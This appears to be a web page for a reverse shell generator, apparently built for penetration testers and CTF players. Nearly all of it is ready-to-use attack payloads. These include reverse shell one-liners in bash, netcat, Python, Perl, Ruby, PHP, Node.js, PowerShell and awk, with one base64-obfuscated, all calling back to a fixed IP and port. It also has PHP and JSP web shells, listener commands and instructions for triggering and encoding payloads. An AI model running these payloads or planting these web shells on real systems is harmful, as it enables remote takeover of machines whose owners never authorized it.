Reverse Shell Generator
Set listener IP, port, and target shell once. Every payload below - bash, nc with mkfifo, python, perl, ruby, PHP, Node, PowerShell, awk, plus matching listeners - updates instantly. Use only on systems you are explicitly authorized to test (CTFs, your own labs, engagements with written scope).
Shell
- bash (TCP)
/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
- bash (URL-safe)
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
- bash via base64
echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjUvNDQ0NCAwPiYx | base64 -d | /bin/bash
- nc (mkfifo, classic)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.5 4444 > /tmp/f
- nc -e (when available)
nc 10.10.14.5 4444 -e /bin/bash
- ncat --ssl
ncat --ssl 10.10.14.5 4444 -e /bin/bash
Scripting
- Python 3
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.5",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'
- Python 2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
- Perl
perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
- Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.14.5","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
- PHP
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/bash <&3 >&3 2>&3");'
- Node.js
node -e '(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/bash",[]);var c=new net.Socket();c.connect(4444,"10.10.14.5",function(){c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});})();'
- PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
- Awk
awk 'BEGIN {s = "/inet/tcp/0/10.10.14.5/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Web
- PHP web shell (one-liner)
<?php system($_GET["cmd"]); ?>
- JSP web shell
<%@ page import="java.util.*,java.io.*"%><%if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));String s;while((s=br.readLine())!=null) out.println(s);}%>
Listener
- Listener: nc
nc -lvnp 4444
- Listener: socat (PTY)
socat file:`tty`,raw,echo=0 tcp-listen:4444
- Listener: pwncat-cs
pwncat-cs -lp 4444
- Stabilize TTY (after callback)
python3 -c 'import pty; pty.spawn("/bin/bash")' && export TERM=xterm && stty raw -echo; fg
Quick reference
Start a listener first, then trigger the payload from the target. The classic flow:
- On your box: nc -lvnp 4444.
- On the target: trigger any of the payloads (typically the bash TCP one if /dev/tcp is available, or the python3 PTY variant if not).
- After callback, stabilize the TTY with the listed command so Ctrl-C and arrow keys work.
If the payload is going through a URL parameter or HTTP header, run it through the URL Encoder first; if it goes through a JSON body, the Base64 tool is handy for wrapping the inner shell command. For Flask-based RCE chains, also check the Flask Session Decoder to confirm session state before/after.